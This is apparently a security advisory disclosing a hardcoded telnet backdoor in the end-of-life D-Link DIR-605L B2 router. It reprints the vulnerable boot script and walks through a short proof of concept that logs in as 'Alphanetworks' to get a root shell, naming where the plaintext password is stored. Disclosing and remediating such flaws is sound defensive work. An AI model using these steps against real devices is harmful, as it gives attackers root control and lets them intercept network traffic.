Securin Zero-Days
CVE-2026-42373 - Hardcoded Telnet Backdoor in D-Link DIR-605L B2 (End-of-Life)
Description
D-Link DIR-605L Hardware Revision B2 is an End-of-Life (EOL) consumer router that contains a manufacturer-installed telnet backdoor with hardcoded credentials. This product reached End-of-Life (EOL) on November 17, 2023. D-Link has confirmed it will not release security patches for EOL products.
The telnet daemon starts unconditionally at boot with the username "Alphanetworks" and the static password. This password is stored in plaintext at /etc/alpha_config/image_sign in the firmware filesystem and is identical across all DIR-605L B2 devices. Successful authentication grants a root shell with full administrative control.
Vulnerable Code
Boot Script: /bin/telnetd.sh
This script executes unconditionally at boot. There is no user-facing option to disable the telnet backdoor.
typescript
#!/bin/sh
image_sign=`cat /etc/alpha_config/image_sign`
echo "Start telnetd ..." > /dev/console
mfc_mode=`flash get_hwflag mfc`
if [ $mfc_mode = 1 ]; then
timeout=" -t 600"
fi
if [ -f "/usr/bin/login" ]; then
telnetd -l "/usr/bin/login" -u Alphanetworks:$image_sign -i br0 $timeout &
else
telnetd &
fiQEMU Validation
Tested with qemu-mips-static v7.2.0. Credentials delivered via named pipe (FIFO).
Proof of Concept
An attacker on the same LAN or WiFi network as the DIR-605L B2 (EOL) can gain full root shell access by connecting to the telnet service (TCP port 23) and entering the hardcoded Alphanetworks credentials. No prior authentication, session tokens, or CSRF tokens are required. The backdoor is available immediately after device boot.
Exploitation Steps
Step 1: Connect to telnet on the router (default LAN IP)
telnet 192.168.0.1
Step 2: At the "login:" prompt, enter the hardcoded username:
Alphanetworks
Step 3: At the "Password:" prompt, enter the firmware-specific password:sample
Step 4: Root shell is granted immediately:
id
uid=0(root) gid=0(root)
The attacker now has full control of the router.
Impact
Exploitation grants root shell on the DIR-605L B2 (End-of-Life). An attacker on the LAN/WiFi can:
- Execute arbitrary commands as root
- Read/modify all router configuration including WiFi passwords and DNS settings
- Intercept, redirect, or modify all network traffic
- Install persistent malware or pivot into the internal network
Root Cause
Backdoor originates from Alpha Networks Inc. (Taiwanese ODM). The "Alphanetworks" username, /etc/alpha_config/ directory, and wrg-prefixed passwords directly identify the ODM. Intended for factory testing but never removed from production firmware.
Remediation
This product is End-of-Life (EOL). No patches will be released by D-Link.
- Replace the device immediately with a currently supported router model.
- Temporary: kill telnetd via backdoor and block port 23 (lost on reboot)
- Do not use this device for any security-sensitive network
Disclosure Timeline
